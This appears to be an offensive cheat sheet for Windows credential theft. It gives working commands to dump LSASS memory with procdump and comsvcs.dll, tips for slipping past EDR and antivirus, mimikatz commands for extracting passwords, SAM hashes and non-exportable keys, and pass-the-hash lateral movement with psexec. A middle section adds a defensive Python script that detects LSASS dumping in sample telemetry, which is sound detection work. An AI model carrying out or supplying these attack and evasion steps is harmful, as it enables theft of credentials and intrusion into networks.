
 Official Doc : https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa

 

Dump memory of LSASS :

Don't forget that you need to be admin to be able to do it.

With ProcDump from Sysinternals :

procdump.exe -accepteula -ma lsass.exe lsass.dmp

or, if it is not available locally :

net use Z: https://live.sysinternals.com

Z:\procdump.exe /AcceptEula -ma lsass.exe lsass.dmp

Some EDR will trigger on the words "procdump" & "lsass". Best is to dump via PID.

Find the process ID of lsass.exe : tasklist /fi "imagename eq lsass.exe" returns its PID, for example 1234

and then procdump.exe -accepteula -ma 1234 lsass.dmp

You could also achieve this manually :

With Task Manager : tab Details / select lsass.exe / right click – Create dump file

If your EDR or anti-virus has blocked you all along, then you can look at this beautiful piece of code :

https://github.com/outflanknl/Dumpert This tool removes the hooks the AV has placed, if any are in place, and then dumps the LSASS memory.

The LOLBAS way is the following :

rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"

(Detected by the Palo Alto XDR solution)

Or you can get my version here (https://github.com/k4nfr3/Dumpert). See the article https://www.bussink.net/lsass-minidump-file-seen-as-malicious-by-mcafee-av/
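Seen from the other side, this is how a defender tells the dump methods above apart. The Python below is an added example, not code from this post or from any of the tools it links. The event dictionaries are constructed samples whose field names mirror the Sysmon ProcessCreate (Event ID 1) and ProcessAccess (Event ID 10) shape, and the allowlist entry is a placeholder to be replaced by your own baseline. It shows why a command-line rule keyed on the target argument misses procdump run against a PID (the evasion described above), while a rule on the handle opened to lsass.exe catches any dumper that opens the process with read access, whatever it is called, Task Manager included.

```python
import re
from typing import Dict, List, Optional

# ---- Rule 1: process-creation command lines (Sysmon Event ID 1 shape) ----
# Keys on the *target argument* of the dumper, so a PID in place of "lsass"
# is not matched; that gap is what Rule 2 is for. Covers procdump64 and an
# optional ".exe", plus the comsvcs.dll MiniDump LOLBAS call.
CMDLINE_INDICATORS = {
    "procdump_lsass_by_name": re.compile(
        r"procdump(?:64)?(?:\.exe)?\b.*?-ma\s+lsass(?:\.exe)?\b", re.I),
    "comsvcs_minidump": re.compile(r"comsvcs\.dll\s*,?\s*MiniDump\b", re.I),
}


def match_cmdline(cmdline: str) -> List[str]:
    """Names of the command-line indicators that fire on one command line."""
    return [name for name, pat in CMDLINE_INDICATORS.items() if pat.search(cmdline)]


# ---- Rule 2: handles opened on LSASS (Sysmon Event ID 10 shape) ----------
PROCESS_VM_READ = 0x0010  # access right needed to read another process's memory

# Constructed allowlist (placeholder): processes that may open LSASS with read
# access in this sample environment. A real list comes from baselining hosts.
ALLOWED_LSASS_READERS = {
    r"c:\windows\system32\wininit.exe",
}


def match_process_access(event: Dict[str, str]) -> Optional[str]:
    """Finding text if a non-allowlisted process got read access on LSASS."""
    target = event.get("TargetImage", "").lower()
    if not target.endswith(r"\lsass.exe"):
        return None
    granted = int(event.get("GrantedAccess", "0x0"), 16)
    if not granted & PROCESS_VM_READ:
        return None  # query-only handles are not a memory read
    source = event.get("SourceImage", "").lower()
    if source in ALLOWED_LSASS_READERS:
        return None
    return f"lsass_memory_read source={source} access={granted:#x}"


def scan(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Run both rules; map each event id that produced a finding to its findings."""
    findings: Dict[str, List[str]] = {}
    for ev in events:
        hits: List[str] = []
        if ev["EventID"] == "1":
            hits = match_cmdline(ev["CommandLine"])
        elif ev["EventID"] == "10":
            hit = match_process_access(ev)
            if hit:
                hits = [hit]
        if hits:
            findings[ev["Id"]] = hits
    return findings


# Constructed sample telemetry (not real logs): procdump by name, procdump by
# PID, the comsvcs call, a benign procdump, then three handle-open events.
SAMPLE_EVENTS = [
    {"Id": "e1", "EventID": "1",
     "CommandLine": "procdump.exe -accepteula -ma lsass.exe lsass.dmp"},
    {"Id": "e2", "EventID": "1",
     "CommandLine": "procdump.exe -accepteula -ma 1234 lsass.dmp"},
    {"Id": "e3", "EventID": "1",
     "CommandLine": r'rundll32 C:\windows\system32\comsvcs.dll MiniDump "1234 dump.bin full"'},
    {"Id": "e4", "EventID": "1",
     "CommandLine": "procdump.exe -accepteula -ma notepad.exe note.dmp"},
    {"Id": "e5", "EventID": "10", "SourceImage": r"C:\Tools\procdump.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010"},
    {"Id": "e6", "EventID": "10", "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"Id": "e7", "EventID": "10", "SourceImage": r"C:\Windows\System32\wininit.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"Id": "e8", "EventID": "10", "SourceImage": r"C:\Program Files\Agent\agent.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1000"},
]

if __name__ == "__main__":
    for event_id, hits in scan(SAMPLE_EVENTS).items():
        print(event_id, hits)
```

Running it reports e1 and e3 from the command-line rule and e5 and e6 from the handle rule; e2 (procdump by PID) is only caught by the second rule, which is the point. The rule tests just the PROCESS_VM_READ bit rather than exact GrantedAccess values, so it stays valid when a tool requests a different combination of rights; noise control comes from the allowlist.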


After dumping the memory, what next ?

Analyse the dump file with Mimikatz (on the PC, or remotely on a machine where there is no AV running)

Switch to minidump :

mimikatz # sekurlsa::minidump lsass.dmp

Dump all passwords :

mimikatz # sekurlsa::logonPasswords

Dump hashes of local accounts / SAM files

Official Doc : https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump

You can back up the SYSTEM & SAM hives with:

reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SAM SamBkup.hiv

mimikatz # lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv

or do a

mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::sam

Or use a Volume Shadow Copy / boot CD to back up these files:

C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SAM

mimikatz # lsadump::sam /system:E:\SYSTEM /sam:E:\SAM

Dump crypto keys

Official doc : https://github.com/gentilkiwi/mimikatz/wiki/module-~-crypto

mimikatz # crypto::keys /export

mimikatz # crypto::capi (patches CryptoAPI inside the mimikatz process so that keys marked non-exportable can be exported)

Pass the hash

1st get PsExec from Sysinternals https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

mimikatz # sekurlsa::pth /user:foundadmin /domain:thedomain /ntlm:xxxxxxxxx

This will start a new command prompt where the whoami command still returns yourself, but the process holds the token of foundadmin.

Now run the lateral movement with psexec, using the new auth token :

psexec \\otherhost cmd

whoami will return foundadmin
